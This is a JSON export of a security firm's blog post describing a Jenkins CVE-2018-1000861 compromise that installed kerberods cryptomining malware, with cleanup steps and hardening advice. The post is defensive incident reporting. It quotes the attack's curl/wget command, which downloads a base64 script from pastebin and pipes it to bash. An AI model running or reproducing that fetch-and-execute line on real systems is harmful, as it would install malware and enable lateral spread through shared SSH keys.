{"id":2679,"date":"2019-05-19T21:20:21","date_gmt":"2019-05-19T19:20:21","guid":{"rendered":"https:\/\/geko2.factoryfy.com\/jenkins-exploit-cryptocurrency-mining-malware\/"},"modified":"2021-11-03T17:13:51","modified_gmt":"2021-11-03T16:13:51","slug":"jenkins-cryptocurrency-malware","status":"publish","type":"post","link":"https:\/\/geko.cloud\/en\/jenkins-cryptocurrency-malware\/","title":{"rendered":"Jenkins Exploit Cryptocurrency mining malware"},"content":{"rendered":"<p>A few days ago, our alert system notified us that several servers belonging to some of our clients had suffered a sudden load spike, and in some cases a direct outage.<\/p>\n<p>After logging into the systems and a brief initial analysis by the Geko team, we found that they had been compromised through a vulnerability in their Jenkins platform, exploited via the well-known CVE-2018-1000861. In short, it allows an attacker to inject and execute code on the server.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-601 aligncenter\" src=\"https:\/\/geko2.factoryfy.com\/wp-content\/uploads\/jenkins-vulnerability-attack-300x260.png\" alt=\"\" width=\"415\" height=\"359\" \/><\/p>\n<p>This diagram details the steps the script performs; in summary, after our analysis we detected the following:<\/p>\n<ul>\n<li>A curl or wget command is run that downloads the base64-encoded script directly and executes it (curl -fsSL https:\/\/pastebin.com\/raw\/B3Ppi9ub||wget -q -O &#8211; https:\/\/pastebin.com\/raw \/ B3Ppi9ub) | base64 -d | bash<\/li>\n<li>Its behavior differs depending on the operating system<\/li>\n<li>It installs a service called netdns that invokes a binary, kerberods, which is the malware itself; it limits CPU usage, dedicating all -1 to cryptocurrency mining<\/li>\n<li>It deletes the \/etc\/hosts file<\/li>\n<li>It installs several cron files, <em>oanacroane<\/em> and others such as the apache cron, that constantly re-download the code and run it again in case you try to stop the threat<\/li>\n<li>The process is configured to launch in runlevel 3<\/li>\n<li>The running binary process is camouflaged, making it undetectable<\/li>\n<li>On Debian systems we also detected the <em>watchbdog<\/em> process<\/li>\n<li>Besides executing the binary and creating the process, the initial script also reads the known_hosts file and tries to jump to other systems using shared ssh keys. On a Jenkins system, this is more than likely to succeed.<\/li>\n<\/ul>\n<p>After several hours of investigation, we found that it was necessary to run a busybox on Linux in order to eliminate the masked process. Geko used this one: https:\/\/busybox.net\/downloads\/binaries\/1.30.0-i686\/busybox<\/p>\n<p>Thanks to some procedures from the repo https:\/\/git.laucyun.com\/laucyun and our own scripts, we managed to eliminate the threat until we were able to secure the systems again and reinstall the compromised ones.<\/p>\n<p>Keep in mind that the attack scripts are deep and complex, and even though they have been reverse engineered, since the repository is constantly being improved by the Chinese attacker group &#8220;Rocke Group&#8221;, it is practically impossible to guarantee 100 % that a system is fully protected.<\/p>\n<p>The most surprising thing of all is that, a priori, it is a malware that infects automatically, and in the README of the malware code repo the attacker group states that their intention is not to break anything, simply to identify security vulnerabilities and take a small &#8220;slice&#8221; by mining cryptocurrencies, nothing more &#8230; they even offer to help in case the infected require support &#8230; which we obviously did not take up.<\/p>\n<h3>Good practice guide:<\/h3>\n<ul>\n<li>Avoid having curl and\/or wget binaries on our systems<\/li>\n<li>Avoid running Jenkins as the root user<\/li>\n<li>Avoid publicly exposing the Jenkins service, ssh or any vulnerable service or port<\/li>\n<li>Keep all services, OS, etc. at the latest security version the vendor indicates<\/li>\n<li>Avoid sharing ssh keys across systems<\/li>\n<li>Keep known_hosts files clean<\/li>\n<li>Monitor production systems 24x7 with preventive and proactive alerts<\/li>\n<li>Always check the contents of our systems&#8217; backups<\/li>\n<li>Version-control scripts and files (crons, hosts, etc.) to be able to recover the systems in case of attack<\/li>\n<\/ul>\n<p>We leave you the link to our public repository with a first, summarized version of the cleaning script we used:<\/p>\n<p><a href=\"https:\/\/github.com\/GekoCloud\/cryptocurrency-mining-malware-clean-tool\">https:\/\/github.com\/GekoCloud\/cryptocurrency-mining-malware-clean-tool<\/a><\/p>\n<p>From Geko we will be happy to help you if you identify this vulnerability in your system, <a href=\"https:\/\/geko.cloud\/en\/contact\/\">contact us<\/a>!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A few days ago, our alert system notified us that several of the servers of some clients had a totally abrupt load growth in the system, even in some cases a direct downtime occurred.
After entering the systems, after a brief initial analysis of the Geko team, we detected that the systems had been compromised [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2392,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[67],"tags":[83],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Jenkins Exploit Cryptocurrency mining malware - Geko Cloud<\/title>\n<meta name=\"description\" content=\"In this case we describe the experience and actions that the Geko Cloud technical team took to deal with an attack resulting from the jenkins vulnerability CVE-2018-1000861 that infected our clients&#039; servers with the kerberods malware that mined cryptocurrencies and infected their servers.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Jenkins Exploit Cryptocurrency mining malware - Geko Cloud\" \/>\n<meta property=\"og:description\" content=\"In this case we describe the experience and actions that the Geko Cloud technical team took to deal with an attack resulting from the jenkins vulnerability CVE-2018-1000861 that infected our clients&#039; servers with the kerberods malware that mined cryptocurrencies and infected their servers.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\" \/>\n<meta property=\"og:site_name\" content=\"Geko Cloud\" \/>\n<meta property=\"article:published_time\" content=\"2019-05-19T19:20:21+00:00\" \/>\n<meta property=\"article:modified_time\" 
content=\"2021-11-03T16:13:51+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\" \/>\n\t<meta property=\"og:image:width\" content=\"920\" \/>\n\t<meta property=\"og:image:height\" content=\"797\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Jose Luis S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@geko_cloud\" \/>\n<meta name=\"twitter:site\" content=\"@geko_cloud\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\"},\"author\":{\"name\":\"Jose Luis S\u00e1nchez\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/person\/d06aff498ebfbc75b5010ebe92af41ed\"},\"headline\":\"Jenkins Exploit Cryptocurrency mining malware\",\"datePublished\":\"2019-05-19T19:20:21+00:00\",\"dateModified\":\"2021-11-03T16:13:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\"},\"wordCount\":632,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/geko.cloud\/es\/#organization\"},\"image\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"keywords\":[\"Jenkins\"],\"articleSection\":[\"Labs\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\",\"url\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\",\"name\":\"Jenkins 
Exploit Cryptocurrency mining malware - Geko Cloud\",\"isPartOf\":{\"@id\":\"https:\/\/geko.cloud\/es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"datePublished\":\"2019-05-19T19:20:21+00:00\",\"dateModified\":\"2021-11-03T16:13:51+00:00\",\"description\":\"In this case we describe the experience and actions that the Geko Cloud technical team took to deal with an attack resulting from the jenkins vulnerability CVE-2018-1000861 that infected our clients' servers with the kerberods malware that mined cryptocurrencies and infected their servers.\",\"breadcrumb\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\",\"url\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"contentUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"width\":920,\"height\":797,\"caption\":\"jenkins\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/geko.cloud\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Jenkins Exploit Cryptocurrency mining malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/geko.cloud\/es\/#website\",\"url\":\"https:\/\/geko.cloud\/es\/\",\"name\":\"Geko Cloud\",\"description\":\"Servicios de consultor\u00eda cloud y 
devops\",\"publisher\":{\"@id\":\"https:\/\/geko.cloud\/es\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/geko.cloud\/es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/geko.cloud\/es\/#organization\",\"name\":\"Geko Cloud\",\"url\":\"https:\/\/geko.cloud\/es\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/geko.cloud\/wp-content\/uploads\/2021\/10\/geko_logo-positivo.png\",\"contentUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/2021\/10\/geko_logo-positivo.png\",\"width\":1650,\"height\":809,\"caption\":\"Geko Cloud\"},\"image\":{\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/geko_cloud\",\"https:\/\/www.instagram.com\/gekocloud\/\",\"https:\/\/www.linkedin.com\/company\/gekocloud\",\"https:\/\/www.youtube.com\/channel\/UC5EFLCqUM7fEaXSa_0nWowQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/person\/d06aff498ebfbc75b5010ebe92af41ed\",\"name\":\"Jose Luis S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ebfd055d4dba456220c682523fcc237c?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ebfd055d4dba456220c682523fcc237c?s=96&d=mm&r=g\",\"caption\":\"Jose Luis S\u00e1nchez\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","_links":{"self":[{"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/posts\/2679"}],"collection":[{"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/comments?post=2679"}],"version-history":[{"count":2,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/posts\/2679\/revisions"}],"predecessor-version":[{"id":5180,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/posts\/2679\/revisions\/5180"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/media\/2392"}],"wp:attachment":[{"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/media?parent=2679"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/categories?post=2679"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/tags?post=2679"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}